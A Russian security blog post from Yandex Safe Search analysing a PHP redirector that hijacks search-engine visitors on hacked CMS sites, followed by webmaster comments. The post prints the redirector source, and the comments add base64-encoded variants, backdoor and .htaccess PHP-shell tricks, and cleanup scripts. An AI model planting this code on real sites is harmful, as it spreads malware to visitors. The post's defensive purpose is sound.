Блог о безопасности

Вредоносный редиректор на osa.pl

14 октября 2011, 17:01

Злоумышленники нередко взламывают сайты для того, чтобы разместить на них редиректоры — ПО, которое автоматически перенаправляет браузер пользователя на подконтрольные злоумышленникам веб-серверы. В результате зараженный сайт становится частью их системы распространения вредоносного кода.


Когда Безопасный Поиск Яндекса обнаруживает такие редиректоры, к содержащим их сайтам применяются следующие меры:

  • В результатах поиска сайт отображается с пометкой о том, что он представляет опасность для пользователя, и количество переходов на него с поисковой выдачи снижается в 50-100 раз.
  • Браузеры, использующие Safe Browsing API Яндекса, также предупреждают пользователей, что страница представляет опасность, даже когда  переход на зараженный ресурс происходит не с поисковой выдачи. Это ещё сильнее снижает посещаемость сайта.
  • Если владельцы взломанного ресурса не устранили проблему, сайт совсем убирается из результатов поиска, т.к. постоянное перенаправление (редирект) на другой сайт, по сути, превращает этот ресурс в дорвей, который не даёт ответов на вопросы, задаваемые пользователями.

Подобные проблемы часто возникают из-за заражения скриптов популярных CMS веб-серверным вредоносным кодом. Наиболее популярным в настоящее время является следующий код:


error_reporting( 0 );
$qazplm=headers_sent(  );
if ( !$qazplm ) {
$referer = $_SERVER[ 'HTTP_REFERER' ];
$uag = $_SERVER[ 'HTTP_USER_AGENT' ];
if ( $uag and !stristr( $uag, "StackRambler" ) and
    !stristr( $uag, "aport" ) and
    !stristr( $uag, "WebAlta" ) and
    !stristr( $uag, "aport" ) and
    !stristr( $uag, "compatible; Yandex" ) and
    !stristr( $uag, "dyatel" ) ) {
if ( stristr( $referer, "yandex" ) or
     stristr( $referer, "yahoo" ) or
     stristr( $referer, "google" ) or
     stristr( $referer, "bing" ) or
     stristr( $referer, "rambler" ) or
     stristr( $referer, "gogo" ) or
     stristr( $referer, "live" )  or
     stristr( $referer, "aport" ) or
     stristr( $referer, "nigma" ) or
     stristr( $referer, "webalta" ) or
     stristr( $referer, "meta.ua" ) or
     stristr( $referer, "bigmir.net" ) or
     stristr( $referer, "tut.by" ) or
     stristr( $referer, "ukr.net" ) or
     stristr( $referer, "poisk.ru" ) or
     stristr( $referer, "liveinternet.ru" ) or
     stristr( $referer, "gde.ru" ) or
     stristr( $referer, "quintura.ru" ) or
     stristr( $referer, "qip.ru" ) or
     stristr( $referer, "mail.ru" ) or
     stristr( $referer, "metabot.ru" ) ) {
     if ( !stristr( $referer, "cache" ) or
          !stristr( $referer, "inurl" ) ) {
              header( "Location: http://malwarehost/malwarepath/" );
              exit(  );
   }
  }
}
}

где:
  • malwarehost — хост, который распространяет вредоносное ПО;
  • malwarepath — директория на хосте, который распространяет вредоносное ПО.

Этот код обычно присутствует в PHP-файлах и может быть обфусцирован (закодирован).



Алгоритм работы вредоносного кода

  1. Сначала вызов функции error_reporting(0) отключает вывод ошибок при выполнении скрипта, так что даже если в веб-серверном вредоносном коде произойдет ошибка, то посетивший страницу пользователь ничего не увидит.
    Далее вызовом функции headers_sent(…) проверяется, был ли клиенту отправлен ответ с HTTP-заголовками. Если нет, то происходит получение Referer и User-Agent.
  2. После этого поиском соответствующей подстроки в значении User-Agent проверяется, не бот ли посещает страницу.
  3. Если это не бот, то проверяется, пришел ли он с одной из поисковых систем, приведенных ниже:

    www.yandex.ru;
    www.yahoo.com;
    www.google.com;
    www.bing.com;
    www.rambler.ru;
    www.gogo.ru;
    www.live.com;
    www.aport.ru;
    www.nigma.ru;
    www.webalta.ru;
    www.meta.ua;
    www.bigmir.net;
    www.tut.by;
    www.ukr.net;
    www.poisk.ru;
    www.liveinternet.ru;
    www.gde.ru;
    www.quintura.ru;
    www.qip.ru;
    www.mail.ru;
    www.metabot.ru

  4. Если пользователь перешёл на заражённый сайт с одной из указанных выше поисковых систем, и при этом он не просматривает сохранённую копию страницы в кэше поисковой системы, то выполняется перенаправление пользователя на сайт,  указанный в вызове функции header().


  5. Статистика распространения


    Всего Яндексу известно более 800 зараженных уникальных хостов, которые являются редиректорами на osa.pl. Пик распространения вредоносного кода пришелся на 20.09.2011. Общая динамика заражения приведена ниже:

    Чаще всего этот код находится на сайтах, доменное имя которых расположено в зоне RU:

    На домене osa.pl есть несколько поддоменов, которые являются промежуточными звеньями в цепочках распространения вредоносного кода. Статистика по использованию этих поддоменов такова:

    Сайты с некоторыми CMS заражают редиректорами на osa.pl чаще, чем другие:

    Распространяемое вредоносное ПО


    Вредоносное ПО, распространяемое через эти редиректы, на 28.09.2011 детектировали всего 4 антивируса из 43 (по данным VirusTotal.com).

    Хеши семпла:

    • MD5: c4d0e04e521dd8d920cb644b4075c6f0;
    • SHA1: 2fa568a42c04f6647fa5808bf8fdfd405aced9c3;
    • SHA256: 428262fa0edbee619df2913beaf0e22abcd6e67408db892bc275292526d3157f.


    Распространяемое вредоносное ПО часто представляет собой фальшивый антивирус. Для автоматического запуска во время загрузки ОС оно прописывает себя в ветку реестра: 

    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce


    Пользовательский интерфейс этого фальшивого антивируса выглядит так:



    Никакого отношения к настоящим антивирусам данное вредоносное ПО, разумеется, не имеет.


    Рекомендации


    Рекомендации по обеспечению безопасности вашего сайта аналогичны приведённым в предыдущей статье.

    Кроме того, обязательно проверяйте свой сайт на наличие вредоносного кода в auto_prepend_file и конструкции, связанные с обработкой ошибок.

    Команда безопасного поиска Яндекса


56 комментариев
сразу удалять их из выдачи до устранения проблем - не стоит способствовать распространению заразы :)

Может яндекс закрыть лучше:-)

А нужно ли так подробно описывать методику работы таких вещей, да ещё и с чистым кодом?

Остаётся лишь чуток доработать код и в путь?

Злоумышленники, даже script kiddies, такие методики и без нас отлично знают, для них мы ничего не откроем. Вебмастерам же понимание же общих принципов работы и монетизации вредоносного кода помогает защищаться от новых угроз и не попадаться на разные удочки.

А приведённый  «чистый код» можно просто попробовать найти в файлах своего сайта (лучше, конечно, во всех файлах на веб-сервере). Код, конечно, может быть обфусцирован, но разные eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 с абракадаброй тоже весьма привлекают внимание, как и вариации на тему file, fopen, readfile, file_get_contents, HttpRequest::send с чужими адресами.

а как убрать этот вирус с сайта?

проверяйте все php файлы на хостинге на предмет строк в самом начале

base64_decode("ZXJyb3Jfcm*блаблабла
и удаляйте их

я сформулирую вопрос немного иначе: как удалить

base64_decode("ZXJyb3Jfcm*блаблабла

массово из всех файлов желательно без скаичвания файлов сайта на компьютер по SSH

Я Сегодня у себя на 4 сайтах обнаружил и рашифровал стору и  вирус теперь введет на  http://happynewyear.osa.pl

 error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER['HTTP_REFERER'];

$uag=$_SERVER['HTTP_USER_AGENT'];

if ($uag) {

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: http://happynewyear.osa.pl/");

exit();

}

}

теперь ведет на happynewyear.osa.pl как с ним боротся буду чистить руками, а в яндекс безопасности нечего не показывает пишет чистый сайт и VirusTotal.com нечего не показал

подскажи в каких файлах искать?

я посмотрел у меня статистика как то резко упала если в среднем на один из моих проектов заходило около 1500 а потом начало 600 и т.д. хотя все странице в выдачи были на своих местах я подумал еще один счетчик поставить и когда залез в index.php начал просматривать по всем файлам и все файлы с расширением php были заражены код был примерно такой 


nJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

скажите почему тогда прямая ссылка заходит на сайт а через поисковик отправляет на вирусный сайт? ну вы же все могучая большая организация думаю могли бы все это поправить самостоятельно... почемуто хакеры могут а вы нет? еще вопросик объясните такую ситуацию несколько недель назад у меня была такая же проблема написал вам в тех под держку все встало на свои места сейчас опять такая же ерунда ... что вирус работает и не работает? вам не кажеться странно? если такая большая статистика которую вы показали выше почему здесь всего 8 коминтариев? очень странно работает вирус ябы сказал избирательно.... антивирусник ничего не находит... еще одна странная ситуация...-------------------------------------------------

вспоминается один анекдот если хакеры сделали редирект ну сделайте вы на его редирект свой редирект... и если вам мы важны как пользователи вашего ресурса извещали бы нас о таких казусах... чтоб мы не узновали об этом что статистика совсем давно упала... сделайте что нибудь уважаемая команда безопасного поиска Яндекса

Господа, глупо обвинять Яндекс в том , что мы используем открытый исходный код CMS. Любой крысенышь с консолью может найти лазейку. А по сему лучше помогать друг другу и делиться соображениями. У меня сайты стоят на сервере под Вин Сервер 2008. Защита сервера максимальная исходный код закрыт. Но лазейки через Джумла и рнрВВ остались. Я с 11 числа этого месяца не могу обнаружить код этих крысенышей. Если у кого есть соображения поделитесь. Воспользовался всем, что есть в этой статье. Дело в том что этот код сработал у меня в трех сайтах на Джумле и в одном на рнрВВ. Если бы , как писал господин выше, было целенаправленое занесеение вредоносного кода, то такой массовости не наблюдалось. Поэтому предлагаю делиться больше опытом и больше делать публикаций в инете. Кто имеет знания тот вооружен.

Чем больше будем обнародывать деятельность крысенышей , тем меньше им оставим поля деятельности. 

золотые слова

У меня тот же код , как и у вас. Поражены все файлы php в рнрВВ3 и Джумле 1.5

Тут спрашивают , как искать ?

Улыбнуло. Берете файл с сервера и открываете в редакторе и первая строчка увиденная принесет вам много "радости" Мне проще у меня сервер под Виндой 2008 и я по "Удаленному рабочему столу" это делаю быстро. А вот владельцам линуЛОХА с фЕтЕпЕ тут не по завидуешь.

Извините, что ерничаю, но мой опыт работы в инете показал, что лучше закрытых исходников ничего нет. По крайне мере на 90% спишь спокойно. 

Пффе, по SSH открывается консоль, а в ней Midnight Commander - это как нортон коммандер. В нём почти как удалённый рабочий стол. Можно так делать. А вообще- шаблоны не надо брать ворованные, а CMS держать на свежей версии. Остерегайтесь .htaccess php shell в виде картинок - есть каталог, где добавлено AddTypeHandler .png Application-PHP , как-то так. Тогда рядом в этом каталоге обязательно сидит пхп шелл.

Тоже заразился!

Причина в файле: configuration.php

Код был таков:

nJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

Сервис для расшифровки кода: http://uneval.com/ru/

 

помогла статья с одного сайта:

 

Joomla 1.0 и Redirect с Яндекс и Google

В интернете активизировался вирус, который редиректит пользователей с поисковых систем на зараженные сайты http://grooogle.osa.pl и http://marthamio.cu.cc/. Взлому подвержены сайты на Joomla 1.0.

Мной зафиксированы случаи взлома сайтов на Joomla 1.0.15 Lavra Edition и более ранних версий.

Устраняем последствия взлома сайта злоумышленниками.

Удаляем последствия взлома

Первым делом исправляем следующую запись в самом начале файла configuration.php:

[тут много символов]

...KfQ0KCSAgICB9DQoJCX0="));

if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); }

на

 

if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); }

Далее необходимо восстановить права доступа к файлу в корневой папке на 644 или даже 444, чтобы вредоносный скрипт не смог самостоятельно внести изменения в конфигурационные настройки.

Теперь сайт восстановит свою работоспособность и пользователи смогут при переходе с поисковика попадать на сайт.

Внимание

Данные поправки, которыми вы ликвидируете последствия взлома, только восстанавливают работу сайта, но никак не исключают возможность повторного взлома и изменения конфигурационных настроек.

Joomla 1.0 очень уязвимая CMS, поскольку в интернете есть много информации о методах взлома. Лучшим решением по обеспечению безопасности данных на вашем сайте является переход на современную версию CMS Joomla 1.6-1.7.

 

Сайт стал хоть открываться с поиска.

Прочитал. Только вот у меня и Joomla1.7 заражена была, причем с HTML5. И в CMS Joomla вирус вообще создал папку "xmlrpc" с зараженными файлами в корне сайтов.

" Далее необходимо восстановить права доступа к файлу в корневой папке на 644 или даже 444"

Улыбнуло не падеЦки.... А у меня Сервер на Винде 2008 и там вообще доступ к папкам закрыт для всех кроме МЕНЯ , а я при входе на сервер прохожу валидацию.... Это я к чему, что открытые исходники   CMS позволяют принимать команды консЮли доброжелателей. И если вы думаете , что написали крутой код для защиты открытого исходника, то крысеныши напишут круче код , что бы его взломать.

Потому что исходный код открыт и доступен для изучения и честных пользователей и крысенышей.  

Проблема повторилась ёпрст. Прям буквально через часа 3 всё заново, только кода в конфиге нет. буду искать где он теперь ((((((((

Тоже такая папка в корне появилась! xmlrpc

Как же с этим бороться то вообще?

Просто вы не внимательно прочитали ВСЮ эту тему. Прежде всего нужно воспользоваться легальным антивирусным сканером типа Dr.Webb(он кстати бесплатный) и проверить весь сервер или хост и ОБЯЗАТЕЛЬНО компы всех кто имеет доступ к админкам.

Вручную проверяються ВСЕ файлы расширения php имеющиеся на сервере. Еще раз повторяю ВСЕ и не плохо бы указывать По сайта, которое вы используете. На время проверок и не только обратите внимание на рекламные банеры , лучше их снять, а если сомнительные , то вообще отказаться. 

Вообщем нашёл ещё кода, в компонентах, там аж каждый фаил заражён, да и на странице не по одному коду, а сразу штук по 20 примерно на стр.

Что интересно, сайт скачал на пк, воспользовался поиском по файлам по различным запросам. но нечего не нашлось. Поэтому только вручную открывать каждый фаил и смотреть этот код.

Тоже подцепил подобный вирус. При чем данный код прописался на нескольких сайтах на Joomla 1.5, находящихся на одном хостинге. В итоге поковырялся - понял что измененные файлы имеют одинаковую дату изменения - почистил такие файлы от вредоносного кода. В процессе поиска обнаружил что на одном сайте стоит время изменения папки images. Зашел в нее и нашел там среди картинок файл post.php, который позволяет злоумышленнику запустить произвольный php код на сайте. Как я понял имеено через этот файл и шло все заражение.

Поэтому у кого стоит Joomla 1.5 и есть такая проблема проверьте этот момент.

Тоже снес post.php в images и папку xmlrpc. Пришлось корячиться и в 800 файлах удалять один и тот же код eval(base64_decode("DQplcnJ и т.д. Попогла программулька Словоед. Простая как огурец. Задал тип файлов (в нашем случае *.php), что на что поменять (в нашем строку eval(base64.... на ничего, короче просто вырезать) и пуск. Закачал все добро обратно на хостинг. Заработало. Но Дыра-то где-то осталась....Это и беспокоит.

Дыра естественно осталась, надеюсь что отправленые нами коды на Яндекс расшифруют и выложат алгоритм.

Програмку учту посмотрю. Вот за это спасибо ! 

Но. папка xmlrpc она идёт вместе с джумлой, я не понял, её удалять или нет?

Кстати, на сайте около 500 таких кодов было. удалял прогой Notepad ++  Быстро очень. а то ручками наверно неделю бы сидел.

Скорей всего вирус пускают через загрузчик post.php. появляется в папке с картинками. а оттуда расползается как червяк

Блин, опять такая же ерунда (((((((. Написал хостеру.

Коллеги, ка залатать дыру? Кто знает?

у меня год назад такое было.

проблема была в том что вирус залез в фтп клиент и там вычитал сохранные пароли.

это не проблема джумлы.

у меня как на джумле так на друпал сайт заразился.

и даже на джумле 1.6.

ПАРОЛЬ по ФТП был перехвачен

кстати кто где хостяится.. может хостер дырявый?

я на jino.ru

Я думаю, что проблемы с хостерами надуманые, к примеру jino.ru это один из лучших и по коллективу и по услугам хостинг центр, отличные ребята и до сих пор дружу с ними. Хотя сам я на Инфобоксе, он мне больше подходит по тех.характеристикам.

Код сработал сразу и на всех сайтах, кроме с поддоменами третьего уровня....это у меня. И у меня вообще на Сервере2008 нет долбаного фЕтЕпЕ. Я думаю но пока только думаю, что была запущена не целевая инсталяция кода, а на дурака. У кого сработает. У меня разные зоны доменов, так что утверждения, что крысеныши работали в обозначеной доменной зоне тоже отпадает. Код был запущен на инсталяцию в рнр, то есть крысеныши нашли лазейку на уровне открытого кода. Я представляю сейчас, как эти крысы сидят и довольные читают, как мы тут гадаем на кофейной гуще. А все может быть очень просто.  

На есть ли на каком-нибудь джумловском форуме информация о нашей беде и как ее вылечить железно?

Скорее всего ответ есть на помойках крысенышей. Потому что заражение не только по джумле было и джумла очень легко чистится востановлением из архива. Ее вообще можно вручную не чистить, а тупо удалять папку с сервера , создать новую, закинуть бэк-ап и счастливо ковырять в носу. Вот с рнрВВ действительно проблема , особенно если они напиханы модификациями. На линуЛоховых серверах это тяжело чистится. Но к сожалению в этом топике больше жалуются владельцы Джуумлы и причем я вас не совсем понимаю.... Как это так не иметь бэкап сайта ??????????????? Ведь востановить Джуумлу нескольких минут дело .

у меня та же самая проблема. всего три сайта - два на жумле 1.5, другой на самописной мини-админке. первый раз когда попал вирус - поменял все пароли (кроме sql), закинул чистые файлы сайтов с бекапа. потом произошло еще один раз. опять поменял пароли, установил ограничение на папки с 775 на 555 (самописная админка) и 755 (джумла, тк модуль не работал с 555). добавил php.ini с блокировками. через день всё произошло снова, НО джумла осталосась цела, а вот самописные сайт опять пострадал. Сейчас опять вытащил бекапы. пароль не менял пока. тесчу свой пк на вирусы, хотя последнее крайне маловероятно, но вдруг... вообщем думаем дальше )

Я при востановлении из бэкапов менял БД. У меня Сервер2008 там это легко без всяких прописЁвываний. Потом через sqlЭкспресс выкидывал зараженные БД. С рнрВВ3 было чуть по сложней но тоже довольно быстро справился. Кстати когда востанавливаешь Джумлу из бэкапа , то там же есть функция изменить БД.

В линухе все чистится одной командой 

for fname in `find ./ -name '*'`; do sed -i 's/old_text/new_text/g' $fname; done

Может кому пригодится

JOOMLA 1.5.25 и WP на SWEB.ru заражены, Плюс один на NIC.RU пользовался FileZilla FTP Client, проблему поека не решил..., жесткачь блин.

папка xmlrpc неотъемлемая часть joomla, посмотрите например в чистую джумлу, или просто почитайте в инете например тут - http://kjoomla.com/station/34-joomla/70-pluginsjoomla.html

 

Что касается чистки вредоносного кода по всей среде php файлов то самым удобным нашел этот вариант :

 

создайте php файл и назовите к примеру 1.php :

$root  =  $_SERVER['DOCUMENT_ROOT'];

$search = 'eval(base64_decode("........весь зашифрованый код                    '; //строка, которую нужно найти в каждом файле и заменить на ''

$thisfile = '1.php'; //чтобы в процессе не заменить искомую строку в этом же файле

function find_and_replace($dir,$search,$thisfile)

{

 

$new_dir = null;

$dir_files = opendir($dir);

    while(false !== ($file = readdir($dir_files)))

    {

 

        if($file != '.' && $file != '..')

        $new_dir[] = $dir."/".$file;

    }

 

        if($new_dir)

        foreach($new_dir as $check )

        {

              if((is_file($check)) && (basename($check) !== $thisfile)) {

                $handle = fopen($check, "rb");

                $contents = '';

                while (!feof($handle)) {

                  $contents .= fread($handle, 8192);

                }

                fclose($handle);

                if (strpos($contents,$search) !== false) {

                    $file = fopen ($check,"w+");

                    $str = str_replace($search,'',$contents);

                    fputs($file, $str);

                    fclose ($file);

                    echo $check."
";

                    }

              }

              elseif(is_dir($check))

              find_and_replace($check,$search,$thisfile);

        }

}

find_and_replace($root,$search,$thisfile);

 

Далее запустите скрипт и он автоматически вычистит бяку(у меня вычистил около 1500 файлов), правда к слову сказать не везде например в xmlrpc придется чистить в ручную.


Все бы хорошо и системы диагностики в том числе Яндекса пишут что вируса нет, но вот в поисковой выдаче редирект остался и на Яндексе и на Гугле, возможно просто надо подождать апдейта индексирования, пока не ясно.

После удаления всех этих сигнатур в поиске должно все быть в норме и попадать на ваш сайт... Скорее Вы не все удалили... У меня после удаления все пришло внорму)

Немного модифицировал для удобства.


$cntfiles=0;

$root  =  $_SERVER['DOCUMENT_ROOT'];

$search = 'eval(base64_decode('; //строка, которую нужно найти в каждом файле и заменить на '' )
$search1 = 'base64_decode('; //строка, которую нужно найти в каждом файле и заменить на '' )

$thisfile = '????.php'; //чтобы в процессе не заменить искомую строку в этом же файле
// при поиске и только отображении проверяем все файлы, даже сам себя, а вдруг дополнительно заражен.

function find_and_replace($dir,$search,$thisfile)

{

global $cntfiles;
global $root;
global $search;
global $search1;
global $thisfile;

$new_dir = null;

$dir_files = opendir($dir);

    while(false !== ($file = readdir($dir_files)))

    {

 

        if($file != '.' && $file != '..')

        $new_dir[] = $dir."/".$file;

    }

 

        if($new_dir)

        foreach($new_dir as $check )

        {

              if((is_file($check)) && (basename($check) !== $thisfile)) {

                 $cntfiles=$cntfiles + 1;

                $handle = fopen($check, "rb");

                $contents = '';

                while (!feof($handle)) {

                  $contents .= fread($handle, 8192);

                }

                fclose($handle);

                $ps1=0;

               while (strpos($contents,$search1,$ps1) !== false) {
                   $ps1=strpos($contents,$search1,$ps1);
                   $ps1_e=strpos($contents,')',$ps1);


                    echo 'File - '.$check;

                if (strpos($contents,$search,$ps1) !== false) {
                    echo ' eval(';
                    }

            echo ' base64_decode';
                    $coded1=substr($contents,$ps1+14, $ps1_e-$ps1-14);
                    if ((substr($coded1,0,1)==='"') || (substr($coded1,0,1)==="'"))
            {
             $coded1=substr($coded1,1,strlen($coded1)-2);
            }
            echo '('.$coded1.')
Pos='.$ps1.' Len='.strlen($coded1).'
';
               $coded1=base64_decode($coded1);
                    $coded1 = str_replace('                    echo ''.$coded1.'

';
            $ps1=$ps1+($ps1_e-$ps1-14);

                    }
              }

              elseif(is_dir($check))
              find_and_replace($check,$search,$thisfile);
        }
}
find_and_replace($root,$search,$thisfile);
echo 'Check '.$cntfiles.' files';

надо бы попробовать прогромульку словоед, благодарю!

Также смотрите файл 

includes/defines.php

 я не сразу обнаружил что он тоже заражен. 

Я поступил так: сделал бэкап зараженного сайта, распаковал на локальном компютере, проверил касперским, он вылечил кучу файлов, опять сделал бэкап (локально) снес все с сервера и востановил из локального бэкапа. Так же в корень джумлы выложил файл .ftpaccess такого содержания:


Allow from (ваш IP без скобок)
Deny from all

он закрывает доступ по FTP кроме вашего адреса.
 

Для такого вируса и других похожих даже отдельный антивирус бесплатный сделали: virusdie.ru (нормально лечит и бесплатно пока)

Большое спасибо, Дастискрин, код удалился, посмотрим что дальше будет... Ручками его нереально было убрать, он мало того что в КАЖДОМ ПХП поселился, так еще и по нескольку раз (до 180 раз аж)... так что сайт-антивир нашел порядка 26000 вирусов:))) ну строк этих короче.

А вот POST.PHP из парки Images удалил вручную, а то снова заразит, как я понимаю. Пока все. 

 

Теперь http://www.virusdie.ru находит и лечит редиректы с мобильных устройств

БЛАГОДАРЮ! почистил пока только при помощи скрипта.. вручную не лез никуда, но лог лечения с сайта точь в точь повторил количество заражённых файлов (строчек), которое я увидел при поиске этого кода с notepad++ так что, я думаю удалилось всё.. надеюсь))  P.S. 7210 строчек го*нокода было

POST.PHP удалил нах...из корневой папки Загрузил туда скрипт, но пишет, файл скрипта антивируса не найден в корне сайта! Плять...Что это может быть????

 

Вероятно, речь о сайте: dizainersky.ru ? Возможно, затык в настройках хоста. Сейчас постараемся разобраться.

 

Посмотрите настройки .htaccess При запросе скрипта антивируса происходит редирект на 404.

Дейнекин Михаил
29 июля 2015, 22:30

VirusDie мошенники. Якобы находят вирусы у Вас на сайте, просят оплату что-бы показать в каких файлах они их нашли. После оплаты выясняется что вирусов нет. Они вирусами считают 301 редирект, не разбирая вредорносный он или просто кросс-сайтовый. До оплаты они не показывают, что "заражения" в htaccess, а пишут что "найдено 3 заражения". Возврат денег за этот обман не производят ссылаясь на пользовательское соглашение.

Когда добавлял очередную стать про то как правильно выбрать принтер для дома на свой сайт наткнулся на такой код:

 

nJvcl9yZXBvDcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgK
CEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRDVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVF
BfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzd
HIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29n
byIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJH
JlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iik
gb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3Ry
aXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4
qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc
yKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGDUiKSBvciAhc3RyaXN0cigkcm
mZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLm9zYS5wbC8iKTsNCmd
4aXQoKTsNCn0NCn0NCn0NCn0=")

Вирусдай — облачный антивирус для сайтов.

Сервис www.virusdie.ru перешел из стадии прототипа в открытую альфа-версию. Он сканирует и лечит сайты.

Можно как и раньше сканировать и лечить сайты «пачками». Как и раньше он не требует установки, находит и удаляет редиректы с поисковых систем и мобильных устройств, дефейсы, шелы, бэкдоры и вредоносные коды, а также, выполняет большое число других функций.

